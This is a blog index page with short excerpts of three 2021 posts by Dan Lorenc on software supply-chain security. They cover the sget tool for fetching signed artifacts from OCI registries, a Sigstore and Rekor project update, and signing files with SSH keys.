May 1, 2021

Written by Dan Lorenc

A Safer curl | bash ?

This post is about using container registries (Docker registries, OCI registries, whatever you want to call them) for the storage and distribution of generic, non-container-related binary artifacts. I explain the reasoning below, but first: code and demos Demos! Here’s a quick walkthrough of a draft tool (still WIP!) to securely fetch published contents from an OCI registry, called sget. sgetis part of the sigstore project, and is a standalone client that allows you to retrieve scripts or binaries from any OCI registry.

Tags:  sigstoreinfosecgolangsoftwaresupplychain

Apr 23, 2021

Written by Dan Lorenc

Sigstore Project Update — April 2021

Photo by Brett Jordan on Unsplash Time flies in open source! This post provides a few updates on Sigstore since our last update in March. We’ve been lucky to continue welcoming new community members and contributors, with 39 contributors from over 15 companies and our Slack channel is rapidly approaching 300 members! Let’s jump into some more project updates: Rekor As mentioned above, the Rekor binary transparency log now natively supports signed JARs.

Tags:  sigstorecryptocontainerskubernetesdocker

Jan 25, 2021

Written by Dan Lorenc

SSH is the new GPG

Not really. But Kind of? Did you know that you probably already have a working PKI system for signing artifacts on your laptop today, with no keyservers, web-of-trust, or configuration? You can use it to sign files, and to find the public keys for other people and use them to verify files they signed. So why aren’t more people using this? I think it’s just gone overlooked because it’s a relatively new feature in apretty old piece of software.

Tags:  sigstoregithubopensourcesecurity